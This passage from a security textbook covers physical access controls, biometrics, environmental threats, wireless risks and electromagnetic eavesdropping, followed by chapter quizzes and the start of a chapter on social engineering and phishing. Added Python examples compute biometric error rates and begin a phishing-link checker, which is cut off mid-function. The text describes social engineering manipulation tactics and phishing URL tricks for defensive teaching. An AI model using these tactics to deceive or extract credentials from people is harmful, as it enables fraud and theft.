An increasing number of organizations are implementing VoIP solutions to bring the telephone and computer networks together. While there are some tremendous advantages to doing this in terms of both increased capabilities and potential monetary savings, bringing the two networks together may also introduce additional security concerns. Another common method to access organizational networks today is through wireless access points. These may be provided by the organization itself to enhance productivity, or they may be attached to the network by users without organizational approval. The impact of all of these additional methods that can be used to access a network is to increase the complexity of the security problem.
Physical Security
Physical security consists of all mechanisms used to ensure that physical access to the computer systems and networks is restricted to only authorized users. Additional physical security mechanisms may be used to provide increased security for especially sensitive systems such as servers and devices such as routers, firewalls, and intrusion detection systems. When considering physical security, access from all six sides should be considered—not only should the security of obvious points of entry be examined, such as doors and windows, but the walls themselves as well as the floor and ceiling should also be considered. Questions such as the following should be addressed:
Is there a false ceiling with tiles that can be easily removed?
Do the walls extend to the actual ceiling or only to a false ceiling?
Is there a raised floor?
Do the walls extend to the actual floor, or do they stop at a raised floor?
How are important systems situated?
Do the monitors face away from windows, or could the activity of somebody at a system be monitored?
Who has access to the facility?
What type of access control is there, and are there any guards?
Who is allowed unsupervised access to the facility?
Is there an alarm system or security camera that covers the area?
What procedures govern the monitoring of the alarm system or security camera and the response should unauthorized activity be detected?
These are just some of the numerous questions that need to be asked when examining the physical security surrounding a system.
Tech Tip
Physical Security Is Also Important to Computer Security
Computer security professionals recognize that they cannot rely only on computer security mechanisms to keep their systems safe. Physical security must be maintained as well, because in many cases, if an attacker gains physical access, he can steal data and destroy the system.
Physical Access Controls
The purpose of physical access controls is the same as that of computer and network access controls—you want to restrict access to only those who are authorized to have it. Physical access is restricted by requiring the individual to somehow authenticate that they have the right or authority to have the desired access. As in computer authentication, access in the physical world can be based on something the individual has, something they know, or something they are. Frequently, when dealing with the physical world, the terms “authentication” and “access control” are used interchangeably. The most common physical access control device, which has been around in some form for centuries, is a lock. Combination locks represent an access control device that depends on something the individual knows (the combination). Locks with keys depend on something the individual has (the key). Each of these has certain advantages and disadvantages. Combinations don’t require any extra hardware, but they must be remembered (which means individuals may write them down—a security vulnerability in itself) and are hard to control. Anybody who knows the combination may provide it to somebody else. Key locks are simple and easy to use, but the key may be lost, which means another key has to be made or the lock has to be rekeyed. Keys may also be copied, and their dissemination can be hard to control. Newer locks replace the traditional key with a card that must be passed through a reader or placed against it. The individual may also have to provide a personal access code, thus making this form of access both a something-you-know and something-you-have method.
Tech Tip
Physical and Information Security Convergence
In high-security sites, physical access controls and electronic access controls to information are interlocked. This means that before data can be accessed from a particular machine, the physical access control system must agree with the finding that the authorized party is present.
In addition to locks on doors, other common physical security devices include video surveillance and even simple access control logs (sign-in logs). While sign-in logs don’t provide an actual barrier, they do provide a record of access and, when used in conjunction with a guard who verifies an individual’s identity, can dissuade potential adversaries from attempting to gain access to a facility. As mentioned, another common access control mechanism is a human security guard. Many organizations employ a guard to provide an extra level of examination of individuals who want to gain access to a facility. Other devices are limited to their designed function. A human guard can apply common sense to situations that might have been unexpected. Having security guards also addresses the common practice of piggybacking (aka tailgating), where an individual follows another person closely to avoid having to go through the access control procedures.
Biometrics
Access controls that utilize something you know (for example, combinations) or something you have (such as keys) are not the only methods to limit facility access to authorized individuals. A third approach is to utilize something unique about the individual—their fingerprints, for example—to identify them. Unlike the other two methods, the something-you-are method, known as biometrics, does not rely on the individual to either remember something or to have something in their possession. Biometrics is a more sophisticated access control approach and can be more expensive. Biometrics also suffer from false positives and false negatives, making them less than 100 percent effective. For this reason they are frequently used in conjunction with another form of authentication. The advantage is the user always has them (cannot leave at home or share) and they tend to have better entropy than passwords. Other methods to accomplish biometrics include handwriting analysis, retinal scans, iris scans, voice prints, hand geometry, and facial geometry.
There are many similarities between authentication and access controls in computers and in the physical world. Remember the three common techniques for verifying a person’s identity and access privileges: something you know, something you have, and something about you.
Both access to computer systems and networks and physical access to restricted areas can be controlled with biometrics. However, biometric methods for controlling physical access are generally not the same as those employed for restricting access to computer systems and networks. Hand geometry, for example, requires a fairly large device. This can easily be placed outside of a door to control access to the room but would not be as convenient to control access to a computer system, since a reader would need to be placed with each computer or at least with groups of computers. In a mobile environment where laptops are being used, a device such as a hand geometry reader would be unrealistic.
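The false positive / false negative trade-off mentioned above, worked through as an added example that is not from the textbook: the similarity scores are constructed, and FAR/FRR are the standard names for the two error rates (false accept = false positive, false reject = false negative).

```python
"""False accepts versus false rejects in a biometric verifier.

Added illustration, not from the textbook. A verifier compares a presented
sample against the enrolled template and produces a similarity score; scores at
or above a threshold are accepted. An impostor scoring above the threshold is a
false positive (false accept); a genuine user scoring below it is a false
negative (false reject). Moving the threshold trades one error for the other,
which is why the text pairs biometrics with a second authentication factor.
"""
from dataclasses import dataclass
from typing import Iterable, List, Sequence

# Constructed similarity scores on a 0-100 scale (hypothetical, not measured
# data). "Genuine" = the enrolled person presenting; "impostor" = someone else.
GENUINE_SCORES: Sequence[int] = (88, 92, 79, 95, 70, 85, 90, 64, 83, 91)
IMPOSTOR_SCORES: Sequence[int] = (40, 55, 62, 71, 30, 48, 58, 67, 74, 52)


@dataclass(frozen=True)
class ErrorRates:
    threshold: int
    far: float  # false accept rate: fraction of impostors wrongly accepted
    frr: float  # false reject rate: fraction of genuine users wrongly rejected


def error_rates(threshold: int, genuine: Sequence[int], impostor: Sequence[int]) -> ErrorRates:
    """Compute FAR and FRR when samples scoring >= threshold are accepted."""
    false_accepts = sum(1 for s in impostor if s >= threshold)
    false_rejects = sum(1 for s in genuine if s < threshold)
    return ErrorRates(threshold, false_accepts / len(impostor), false_rejects / len(genuine))


def sweep(genuine: Sequence[int], impostor: Sequence[int],
          thresholds: Iterable[int] = range(0, 101)) -> List[ErrorRates]:
    """Evaluate every candidate threshold; FAR falls and FRR rises as it increases."""
    return [error_rates(t, genuine, impostor) for t in thresholds]


def equal_error_point(genuine: Sequence[int], impostor: Sequence[int]) -> ErrorRates:
    """Threshold where FAR and FRR are closest: the usual one-number summary of a biometric."""
    return min(sweep(genuine, impostor), key=lambda r: abs(r.far - r.frr))


def threshold_for_max_far(max_far: float, genuine: Sequence[int],
                          impostor: Sequence[int]) -> ErrorRates:
    """Lowest threshold whose FAR does not exceed max_far, with the FRR cost it brings.

    A facility that treats a false accept as the serious error tunes this way and
    then lives with the higher reject rate (or adds a second factor for the rejected).
    """
    for rates in sweep(genuine, impostor):
        if rates.far <= max_far:
            return rates
    raise ValueError("no threshold satisfies the FAR target")


if __name__ == "__main__":
    eer = equal_error_point(GENUINE_SCORES, IMPOSTOR_SCORES)
    strict = threshold_for_max_far(0.0, GENUINE_SCORES, IMPOSTOR_SCORES)
    print(f"equal error at threshold {eer.threshold}: FAR={eer.far:.2f} FRR={eer.frr:.2f}")
    print(f"zero false accepts needs threshold {strict.threshold}; FRR rises to {strict.frr:.2f}")
```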
Tech Tip
Biometric Devices
Once only seen in spy or science fiction movies, biometrics such as hand and fingerprint readers, eye-scanning technology, and voice print devices are now becoming more common in the real world. The accuracy of these devices has improved and the costs have dropped, making them realistic solutions to many access control situations.
Physical Barriers
An even more common security feature than locks is a physical barrier. Physical barriers help implement the physical-world equivalent of layered security. The outermost layer of physical security should contain the more publicly visible activities. A guard at a gate in a fence, for example, would be visible by all who happen to pass by. As you progress through the layers, the barriers and security mechanisms should become less publicly visible to make determining what mechanisms are in place more difficult for observers. Signs are also an important element in security, as they announce to the public which areas are public and which are private. A mantrap can also be used in this layered approach. It generally consists of a small space that is large enough for only one person at a time, with two locking doors. An individual has to enter the first door, close the first door, then attempt to open the second door. If unsuccessful, perhaps because they do not have the proper access code, the person can be caught inside this small location until security personnel show up. In addition to walls and fences, open space can also serve as a barrier.
While this may at first seem to be an odd statement, consider the use of large areas of open space around a facility. For an intruder to cross this open space takes time—time in which they are vulnerable and their presence may be discovered. In today’s environment in which terrorist attacks have become more common, additional precautions should be taken for areas that may be considered a possible target for terrorist activity. In addition to open space, which is necessary to lessen the effect of explosions, concrete barriers that stop vehicles from getting too close to facilities should also be used. It is not necessary for these to be unsightly concrete walls; many facilities have placed large, round concrete circles, filled them with dirt, and then planted flowers and other plants to construct a large, immovable planter.
Tech Tip
Signs
Signs can be an effective control, warning unauthorized personnel not to enter, locating critical elements for first responders, and providing paths to exits in emergencies. Proper signage is an important aspect of physical security controls.
Environmental Issues
Environmental issues may not at first seem to be related to security, but when considering the availability of a computer system or network, they must be taken into consideration. Environmental issues include items such as heating, ventilation, and air conditioning (HVAC) systems, electrical power, and the “environments of nature.” HVAC systems are used to maintain the comfort of an office environment. A few years back, they were also critical for the smooth operation of computer systems that had low tolerances for humidity and heat. Today’s desktop systems are much more tolerant, and the limiting factor is now often the human user. The exception to this HVAC limitation is when large quantities of equipment are co-located, in server rooms and network equipment closets. In these heat-dense areas, HVAC is needed to keep equipment temperatures within reasonable ranges. Often certain security devices such as firewalls and intrusion detection systems are located in these same equipment closets, and the loss of HVAC systems can cause these critical systems to fail. One interesting aspect of HVAC systems is that they themselves are often computer controlled and frequently provide remote access via telephone or network connections. These connections should be protected in a similar manner to computer modems, or else attackers may locate them and change the HVAC settings for an office or building.
HVAC systems for server rooms and network equipment closets are important because the dense equipment environment can generate significant amounts of heat. HVAC outages can result in temperatures that are outside equipment operating ranges, forcing shutdowns.
Electrical power is obviously an essential requirement for computer systems and networks. Electrical power is subject to momentary surges and disruption. Surge protectors are needed to protect sensitive electronic equipment from fluctuations in voltage. An uninterruptible power supply (UPS) should be considered for critical systems so that a loss of power will not halt processing. The size of the batteries associated with a UPS will determine the amount of time that it can operate before it too loses power. Many sites ensure sufficient power to provide administrators the opportunity to cleanly bring the system or network down. For installations that require continuous operations, even in the event of a power outage, electric generators that automatically start when a loss of power is detected can be installed. These systems may take a few seconds to start before they reach full operation, so a UPS should also be considered to smooth the transition between normal and backup power.
Fire Suppression
Fires are a common disaster that can affect organizations and their computing equipment. Fire detection and fire suppression devices are two approaches to addressing this threat. Detectors can be useful because some may be able to detect a fire in its very early stages before a fire suppression system is activated, and they can potentially sound a warning. This warning could provide employees with the opportunity to deal with the fire before it becomes serious enough for the fire suppression equipment to kick in. Suppression systems come in several varieties, including sprinkler-based systems and gas-based systems. Standard sprinkler-based systems are not optimal for data centers because water will ruin large electrical infrastructures and most integrated circuit–based devices—such as computers. Gas-based systems are a good alternative, though they also carry special concerns. More extensive coverage of fire detection and suppression is provided in Chapter 8.
Wireless
When someone talks about wireless communication, they generally are referring to cellular telephones (“cell phones”). These devices have become ubiquitous in today’s modern office environment. A cell phone network consists of the phones themselves, the cells with their accompanying base stations that they are used in, and the hardware and software that allow them to communicate. The base stations are made up of antennas, receivers, transmitters, and amplifiers. The base stations communicate with those cell phones that are currently in the geographical area that is serviced by that station. As a person travels across town, they may exit and enter multiple cells. The stations must conduct a handoff to ensure continuous operation for the cell phone. As the individual moves toward the edge of a cell, a mobile switching center notices the power of the signal beginning to drop, checks whether another cell has a stronger signal for the phone (cells frequently overlap), and, if so, switches operation to this new cell and base station. All of this is done without the user ever knowing that they have moved from one cell to another. Wireless technology can also be used for networking. There are two main standards for wireless network technology. Bluetooth is designed as a short-range (approximately ten meters) personal area network (PAN) cable-replacement technology that can be built into a variety of devices, such as mobile phones, tablets, and laptop computers. The idea is to create low-cost wireless technology so that many different devices can communicate with each other. Bluetooth is also interesting because, unlike other wireless technology, it is designed so that devices can talk directly with each other without having to go through a central device (such as the base station described previously). This is known as peer-to-peer communication.
Tech Tip
Wireless Network Security Issues
Due to a number of advantages, such as the ability to take your laptop with you as you move around your building and still stay connected, wireless networks have grown in popularity. They also eliminate the need to string network cables all over the office. At the same time, however, they can be a security nightmare if not adequately protected. The signal for your network doesn’t stop at your office door or wall just because it is there. It will continue propagating to areas that may be open to anybody. This provides the opportunity for others to access your network. To avoid this, you must take steps such as encrypting transmissions so that your wireless network doesn’t become the weak link in your security chain.
The other major wireless standard is the IEEE 802.11 set of standards, which is well suited for the local area network (LAN) environment. 802.11 networks can operate either in an ad hoc peer-to-peer fashion or in infrastructure mode, which is more common. In infrastructure mode, computers with 802.11 network cards communicate with a wireless access point. This access point connects to the network so that the computers communicating with it are essentially also connected to the network. While wireless networks are very useful in today’s modern office (and home), they are not without their security problems. Access points are generally placed throughout a building so that all employees can access the corporate network. The transmission and reception areas covered by access points are not easily controlled. Consequently, many publicly accessible areas might fall into the range of one of the organization’s access points, or its Bluetooth-enabled systems, and thus the corporate network may become vulnerable to attack. Wireless networks are designed to incorporate some security measures, but all too often the networks are set up without security enabled, and serious security flaws exist in the 802.11 design.
Cross Check
Wireless Networks
Wireless network security is discussed in this chapter in relationship to physical issues such as the placement of wireless access points. There are, however, numerous other issues with wireless security, which are discussed in Chapter 12. Make sure to understand how the physical location of wireless access points affects the other wireless security issues.
Electromagnetic Eavesdropping
In 1985, a paper by Wim van Eck of the Netherlands described what became known as the van Eck phenomenon. In the paper van Eck described how eavesdropping on what was being displayed on monitors could be accomplished by picking up and then decoding the electromagnetic interference produced by the monitors. With the appropriate equipment, the exact image of what is being displayed can be re-created some distance away. While the original paper discussed emanations as they applied to video display units (monitors), the same phenomenon applies to other devices such as printers and computers. This phenomenon had actually been known about for quite some time before van Eck published his paper. The U.S. Department of Defense used the term TEMPEST (referred to by some as the Transient ElectroMagnetic Pulse Emanation STandard) to describe both a program in the military to control these electronic emanations from electrical equipment and the actual process for controlling the emanations. There are three basic ways to prevent these emanations from being picked up by an attacker:
Put the equipment beyond the point that the emanations can be picked up.
Provide shielding for the equipment itself.
Provide a shielded enclosure (such as a room) to put the equipment in.
One of the simplest ways to protect against equipment being monitored in this fashion is to put enough distance between the target and the attacker. The emanations can be picked up from only a limited distance. If the physical security for the facility is sufficient to put enough space between the equipment and publicly accessible areas that the signals cannot be picked up, then the organization doesn’t have to take any additional measures to ensure security. Distance is not the only way to protect against eavesdropping on electronic emanations. Devices can be shielded so their emanations are blocked. Acquiring enough property to provide the necessary distance needed to protect against an eavesdropper may be possible if the facility is in the country with lots of available land surrounding it. However, for smaller organizations that occupy only a few offices or floors in a large office building, it would be impossible to acquire enough space. In this case, the organization may resort to purchasing shielded equipment. A “TEMPEST approved” computer will cost significantly more than what a normal computer would cost. Shielding a room (in what is known as a Faraday cage) is also an extremely expensive endeavor.
One of the challenges in security is determining how much to spend on security without spending too much. Security spending should be based on likely threats to your systems and network. While electronic emanations can be monitored, the likelihood of this taking place in most situations is remote, which makes spending on items to protect against it at best a low priority.
A natural question to ask is, how prevalent is this form of attack? The equipment needed to perform electromagnetic eavesdropping is not readily available, but it would not cost an inordinate amount of money to produce it. The cost could certainly be afforded by any large corporation, and industrial espionage using such a device is a possibility. While there are no public records of this sort of activity being conducted, it is reasonable to assume that it does take place in large corporations and the government, especially in foreign countries.
Modern Eavesdropping
Not just electromagnetic information can be used to carry information out of a system to an adversary. Recent advances have demonstrated the feasibility of using the webcams and microphones on systems to spy on users, recording keystrokes and other activities. There are even devices built to intercept the wireless signals between wireless keyboards and mice and transmit them over another channel to an adversary. USB-based keyloggers can be placed in the back of machines, as in many cases the back of a machine is unguarded or facing the public (watch for this the next time you see a receptionist’s machine).
Chapter 3 Review

Chapter Summary

After reading this chapter and completing the exercises, you should understand the following regarding operational and organizational security.

Identify various operational aspects to security in your organization
• Prevention technologies are designed to keep individuals from being able to gain access to systems or data they are not authorized to use.
• Previously in operational environments, prevention was extremely difficult and relying on prevention technologies alone was not sufficient. This led to the rise of technologies to detect and respond to events that occur when prevention fails.
• An important part of any organization's approach to implementing security is to establish policies, procedures, standards, and guidelines to detail what users and administrators should be doing to maintain the security of the systems and network.

Identify various policies and procedures in your organization
• Policies, procedures, standards, and guidelines are important in establishing a security program within an organization.
• The security policy and supporting policies play an important role in establishing and managing system risk.
• Policies and procedures associated with Human Resources functionality include job rotation, mandatory vacations, and hiring and termination policies.

Identify the security awareness and training needs of an organization
• Security training and awareness efforts are vital in engaging the workforce to act within the desired range of conduct with respect to security.
• Security awareness and training is important in achieving compliance objectives.
• Security awareness and training should be measured and managed as part of a comprehensive security program.

Understand the different types of agreements employed in negotiating security requirements
• The different interoperability agreements, including SLA, BPA, MOU and ISA, are used to establish security expectations between various parties.

Describe the physical security components that can protect your computers and network
• Physical security consists of all mechanisms used to ensure that physical access to the computer systems and networks is restricted to only authorized users.
• The purpose of physical access controls is the same as that of computer and network access controls—to restrict access to only those who are authorized to have it.
• The careful placement of equipment can provide security for known security problems exhibited by wireless devices and that arise due to electronic emanations.

Identify environmental factors that can affect security
• Environmental issues are important to security because they can affect the availability of a computer system or network.
• Loss of HVAC systems can lead to overheating problems that can affect electronic equipment, including security-related devices.
• The frequency of natural disasters is a contributing factor that must be considered when making contingency processing plans for an installation.
• Fires are a common problem for organizations. Two general approaches to addressing this problem are fire detection and fire suppression.

Identify factors that affect the security of the growing number of wireless technologies used for data transmission
• Wireless networks have many security issues, including the transmission and reception areas covered by access points, which are not easily controlled and can thus provide easy network access for intruders.

Prevent disclosure through electronic emanations
• With the appropriate equipment, the exact image of what is being displayed on a computer monitor can be re-created some distance away, allowing eavesdroppers to view what you are doing.
• Providing a lot of distance between the system you wish to protect and the closest place an eavesdropper could be is one way to protect against eavesdropping on electronic emanations. Devices can also be shielded so that their emanations are blocked.
Key Terms

acceptable use policy (AUP)
biometrics
Bluetooth
business partnership agreement (BPA)
due care
due diligence
guidelines
heating, ventilation, and air conditioning (HVAC)
IEEE 802.11
incident response policy
interconnection security agreement (ISA)
memorandum of understanding (MOU)
physical security
policies
procedures
security policy
service level agreement (SLA)
standards
TEMPEST
uninterruptible power supply (UPS)
user habits
Key Terms Quiz

Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.

1. _______________ are high-level statements made by management that lay out the organization's position on some issue.
2. The collective term used to refer to the systems that are used to maintain the comfort of an office environment and that are often controlled by computer systems is _______________.
3. A(n) _______________ is a device designed to provide power to essential equipment for a period of time when normal power is lost.
4. _______________ are a foundational security tool in engaging the workforce to improve the overall security posture of an organization.
5. _______________ are accepted specifications providing specific details on how a policy is to be enforced.
6. _______________ is a wireless technology designed as a short-range (approximately ten meters) personal area network (PAN) cable-replacement technology that may be built into a variety of devices such as mobile phones, tablets, and laptop computers.
7. A(n) _______________ is a legal document used to describe a bilateral agreement between parties.
8. _______________ are step-by-step instructions that describe exactly how employees are expected to act in a given situation or to accomplish a specific task.
9. The set of standards for wireless networks that is well suited for the LAN environment and whose normal mode is to have computers with network cards communicating with a wireless access point is _______________.
10. A(n) _______________ is a legal agreement between organizations establishing the terms, conditions, and expectations of the relationship between them.
Multiple-Choice Quiz

1. Which of the following is a physical security threat?
A. Cleaning crews are allowed unsupervised access because they have a contract.
B. Employees undergo background criminal checks before being hired.
C. All data is encrypted before being backed up.
D. All the above.

2. The benefit of fire detection equipment over fire suppression devices is:
A. Fire detection equipment is regulated, whereas fire suppression equipment is not.
B. Fire detection equipment will often catch fires at a much earlier stage, meaning that the fire can be addressed before significant damage can occur.
C. Fire detection equipment is much more reliable than fire suppression equipment.
D. There is no advantage of fire detection over fire suppression other than the cost of fire detection equipment is much less than the cost of fire suppression equipment.

3. Which of the following is a contractual agreement between entities that describes specified levels of service that the servicing entity agrees to guarantee for the customer?
A. Service level agreement
B. Support level agreement
C. Memorandum of understanding
D. Business service agreement

4. During which step of the policy life cycle does training of users take place?
A. Plan for security.
B. Implement the plans.
C. Monitor the implementation.
D. Evaluate for effectiveness.

5. Biometric access controls are typically used in conjunction with another form of access control because:
A. Biometrics are still expensive.
B. Biometrics cannot be copied.
C. Biometrics are not always convenient to use.
D. Biometrics are not 100 percent accurate, having some level of misidentifications.

6. Procedures can be described as:
A. High-level, broad statements of what the organization wants to accomplish
B. Step-by-step instructions on how to implement the policies
C. Mandatory elements regarding the implementation of a policy
D. Recommendations relating to a policy

7. What technique can be used to protect against electromagnetic eavesdropping (known as the van Eck phenomenon)?
A. Provide sufficient distance between the potential target and the nearest location an attacker could be.
B. Put the equipment that you are trying to protect inside a shielded room.
C. Purchase "TEMPEST approved" equipment.
D. All of the above.

8. Key user habits that can improve security efforts include:
A. Do not discuss business issues outside of the office.
B. Never leave laptops or tablets inside your car unattended.
C. Be alert of people violating physical access rules (piggybacking through doors).
D. Items B and C.

9. When should a human security guard be used for physical access control?
A. When other electronic access control mechanisms will not be accepted by employees
B. When necessary to avoid issues such as piggybacking, which can occur with electronic access controls
C. When other access controls are too expensive to implement
D. When the organization wants to enhance its image

10. What device should be used by organizations to protect sensitive equipment from fluctuations in voltage?
A. A surge protector
B. An uninterruptible power supply
C. A backup power generator
D. A redundant array of inline batteries (RAIB)
Essay Quiz

1. Describe the difference between fire suppression and fire detection systems.
2. Discuss why physical security is also important to computer security professionals.
3. Why should we be concerned about HVAC systems when discussing security?
4. Outline the various components that make up (or should make up) an organization's security perimeter. Which of these can be found in your organization (or school)?

Lab Projects

• Lab Project 3.1 Take a tour of your building on campus or at work. What is secured at night when workers are absent? Record the location and type of physical access control devices. How do these access controls change at night when workers are absent? How well trained do guards and other employees appear to be? Do they allow "piggybacking" (somebody slipping into a facility behind an authorized individual without being challenged)? What are the policies for visitors and contractors? How does this all impact physical security?

• Lab Project 3.2 Describe the four steps of the policy life cycle. Obtain a policy from your organization (such as an acceptable use policy or Internet usage policy). How are users informed of this policy? How often is it reviewed? How would changes to it be suggested and who would make decisions on whether the changes were accepted?
Chapter 4 The Role of People in Security

You are the way you are because that's the way you want to be. If you really wanted to be any different, you would be in the process of changing right now.
—FRED SMITH

In this chapter, you will learn how to
• Define basic terminology associated with social engineering
• Describe steps organizations can take to improve their security
• Describe common user actions that may put an organization's information at risk
• Recognize methods attackers may use to gain information about an organization
• Determine ways in which users can aid instead of detract from security
• Recognize the role training and awareness plays in assisting the people side of security

The operational model of computer security discussed in the previous chapter acknowledges that absolute protection of computer systems and networks is not possible and that we need to be prepared to detect and respond to attacks that are able to circumvent our security mechanisms. Another very basic fact that should be recognized is that technology alone will not solve the security problem. No matter how advanced the technology is, it will ultimately be deployed in an environment where humans exist. It is the human element that poses the biggest security challenge. It is hard to compensate for all of the possible ways that humans can deliberately or accidentally cause security problems or circumvent our security mechanisms. Despite all of the technology, despite all of the security procedures we have in place, and despite all of the security training we may provide, somebody will invariably fail to do what they are supposed to do, or do something they are not supposed to do, and create a vulnerability in the organization's security posture. This chapter discusses the human element and the role that people play in security—both the user practices that can aid in securing an organization and the vulnerabilities or holes in security that users can introduce.
People—A Security Problem

The operational model of computer security acknowledges that prevention technologies are not sufficient to protect our computer systems and networks. There are a number of explanations for why this is true, some of them technical, but one of the biggest reasons that prevention technologies are not sufficient is that every network and computer system has at least one human user, and humans are prone to make mistakes and are often easily misled or fooled.

Social Engineering

Social engineering, if you recall from Chapter 2, is the process of convincing an authorized individual to provide confidential information or access to an unauthorized individual. It is a technique in which the attacker uses various deceptive practices to convince the targeted person to divulge information they normally would not divulge or to convince the target of the attack to do something they normally wouldn't do. Social engineering is very successful for two general reasons. The first is the basic desire of most people to be helpful. When somebody asks a question for which we know the answer, our normal response is not to be suspicious but rather to answer the question. The problem with this is that seemingly innocuous information can be used either directly in an attack or indirectly to build a bigger picture that an attacker can use to create an aura of authenticity during an attack—the more information an individual has about an organization, the easier it will be to convince others that he is part of the organization and has a right to even sensitive information. An attacker who is attempting to exploit the natural tendency of people to be helpful may take one of several approaches:
Tech Tip

Social Engineering Works!

Skilled social engineers set up scenarios where the victim is boxed in by various social/work issues and then makes an exception that enables the social engineer to gain some form of access. The attacker can pretend to be an important party and intimidate a lower-level employee, or create a sense of emergency, scarcity, or urgency that moves the victim to act in a manner to reduce the conflict. The attacker can become a "victim," creating a sense of fellowship with the target, creating a false sense of familiarity, and then using that to drive an action. Social engineers can sell ice to Eskimos and make them proud of their purchase, so they are masters at psychological manipulation.

• The attacker may simply ask a question, hoping to immediately obtain the desired information. For basic information that is not considered sensitive, this approach generally works. As an example, an attacker might call and ask who the IT manager is.

• The attacker may first attempt to engage the target in conversation and try to evoke sympathy so that the target feels sorry for the individual and is more prone to provide the information. For information that is even slightly sensitive in nature, the request of which could possibly arouse suspicion, this technique may be tried. As an example, an attacker might call and claim to be under some deadline from a supervisor who is upset for some reason. The target, feeling sorry for an alleged fellow worker, may give up the information, thinking they are helping them avoid trouble with the supervisor.

• The attacker may appeal to an individual's ego. As an example, an attacker might call the IT department, claiming to have some sort of problem, and praising them for work they supposedly did to help another worker. After being told how great they are and how much they helped somebody else, they will often be tempted to demonstrate that they can supply the same level of help to another individual. This technique may be used to obtain sensitive information, such as having the target's password reset.
The second reason that social engineering is successful is that individuals normally seek to avoid confrontation and trouble. If the attacker attempts to intimidate the target, threatening to call the target's supervisor because of a lack of help, the target may give in and provide the information to avoid confrontation. This variation on the attack is often successful in organizations that have a strict hierarchical structure. In the military, for example, a lower-ranking individual may be coerced into providing information to an individual claiming to be of higher rank or to be working for another individual higher up in the chain of command.

Social engineering may also be accomplished using other means besides direct contact between the target and the attacker. For example, an attacker might send a forged e-mail with a link to a bogus website that has been set up to obtain information from the target or convince the target to perform some action. Again, the goal in social engineering is to convince the target to provide information that they normally wouldn't divulge or to perform some act that they normally would not do. An example of a slightly different attack that is generally still considered a social engineering attack is one in which an attacker replaces the blank deposit slips in a bank's lobby with ones containing his or her own account number but no name. When an unsuspecting customer uses one of the slips, a teller who is not observant may end up crediting the attacker's account with the deposit.

Cross Check

Types of Social Engineering

Chapters 1 and 2 both discussed social engineering. Electronic versions of social engineering have become very common. What are the different types of social engineering (especially electronic versions) that we have discussed?

Obtaining Insider Information

An excellent example of social engineering occurred in 1978 when Stanley Mark Rifkin, from Carlsbad, California, stole $10.2 million from the Security Pacific Bank in Los Angeles. Details of the story vary, as Rifkin has never publicly detailed his actions, but a number of facts are known. At the time of the attack, Rifkin was working as a computer consultant for the bank. While working there, he learned details on how money could easily be transferred to accounts anywhere in the United States. The problem would be to actually obtain the money in the first place. In order to do this, he needed to have access to the electronic funds transfer (EFT) code used by the bank to transfer money to other banks. Using the excuse of checking on the computer equipment inside of the room from which the bank made its transfers, Rifkin was able to observe the code for that day. After leaving the room, he used this information to impersonate a bank officer and ordered the transfer of the $10.2 million. Since he had knowledge of the supposedly secret code, the transfer was made with little fanfare (this amount was well below any level that would trigger any suspicion). Earlier Rifkin had set up a bogus account in a New York bank, using a false name, and he deposited the money into that account. He later transferred the money again to another account in Switzerland under a different name. He then used the money to purchase millions of dollars in diamonds, which he then smuggled back into the United States. The crime might have gone undetected if he had not boasted of his exploits to an individual who was more than happy to turn him in. In 1979, Rifkin was sentenced to eight years in prison. At his trial he attempted to convince the judge that he should be released so he could teach others how to protect their systems against the type of activity he perpetrated. The judge denied this request. The diamonds were ultimately turned over to the bank, which tried to recover its loss by selling them.

Up to this point, social engineering has been discussed in the context of an outsider attempting to gain information about the organization. This does not have to be the case. Insiders may also attempt to gain information they are not authorized to have. In many cases, the insider may be much more successful since they will already have a certain level of information regarding the organization and can therefore better spin a story that may be believable to other employees.
Phishing

Phishing (pronounced "fishing") is a type of social engineering in which an attacker attempts to obtain sensitive information from a user by masquerading as a trusted entity in an e-mail or instant message sent to a large group of often random users. The attacker attempts to obtain information such as usernames, passwords, credit card numbers, and details about the user's bank accounts. The message sent often encourages the user to go to a website that appears to be for a reputable entity such as PayPal or eBay, both of which have frequently been used in phishing attempts. The website the user actually visits is not owned by the reputable organization, however, and asks the user to supply information that can be used in a later attack. Often the message sent to the user will state that the user's account has been compromised and will request, for security purposes, the user to enter their account information to verify the details.

In another very common example of phishing, the attacker sends a bulk e-mail, supposedly from a bank, telling the recipients that a security breach has occurred and instructing them to click a link to verify that their account has not been tampered with. If the individual actually clicks the link, they are taken to a site that appears to be owned by the bank but is actually controlled by the attacker. When they supply their account and password for "verification" purposes, they are actually giving it to the attacker.

Phishing is now the most common form of social engineering attack related to computer security. The target may be a computer system and access to the information found on it (such as is the case when the phishing attempt asks for a user ID and password) or the target may be personal information, generally financial, about an individual (in the case of phishing attempts that ask for an individual's banking information).

The e-mails and websites generated by the attackers often appear to be legitimate. A few clues, however, can tip off the user that the e-mail might not be what it claims to be. The e-mail may contain grammatical and typographical errors, for example. Organizations that are used in these phishing attempts (such as eBay and PayPal) are careful about their images and will not send a security-related e-mail to users containing obvious errors. In addition, almost unanimously, organizations tell their users that they will never ask for sensitive information (such as a password or account number) via an e-mail. The URL of the website that the users are taken to may also provide a clue that the site is not what it appears to be: the visible link text may name one site while the link actually points somewhere else, the link may go to a bare IP address, or the brand name may appear only as a subdomain of a domain the attacker controls. Despite the increasing media coverage concerning phishing attempts, some Internet users still fall for them, which results in attackers continuing to use this relatively cheap method to gain the information they are seeking.
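The URL clues described above can be checked mechanically. The following is an added example written for this page, not code from the book: it pulls every link out of an HTML e-mail body and reports the tell-tale signs (visible text naming one host while the link goes to another, a raw IP address in place of a hostname, a user@ prefix that hides the real host, a punycode hostname, and a brand name appearing in the host of an unrelated domain). The sample message and the small brand-to-domain table are constructed for the example, and the "last two labels" notion of registrable domain is a simplification, as the comment notes.

```python
"""Inspect the links in an e-mail body for the URL clues that betray phishing."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Brands an organization expects to see linked only from their real domains.
# This mapping is an assumption made for the example, not an authoritative list.
TRUSTED_BRANDS = {"paypal": "paypal.com", "ebay": "ebay.com"}


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Last two labels of a hostname. A simplification: production code should
    consult the Public Suffix List so that names like example.co.uk are handled."""
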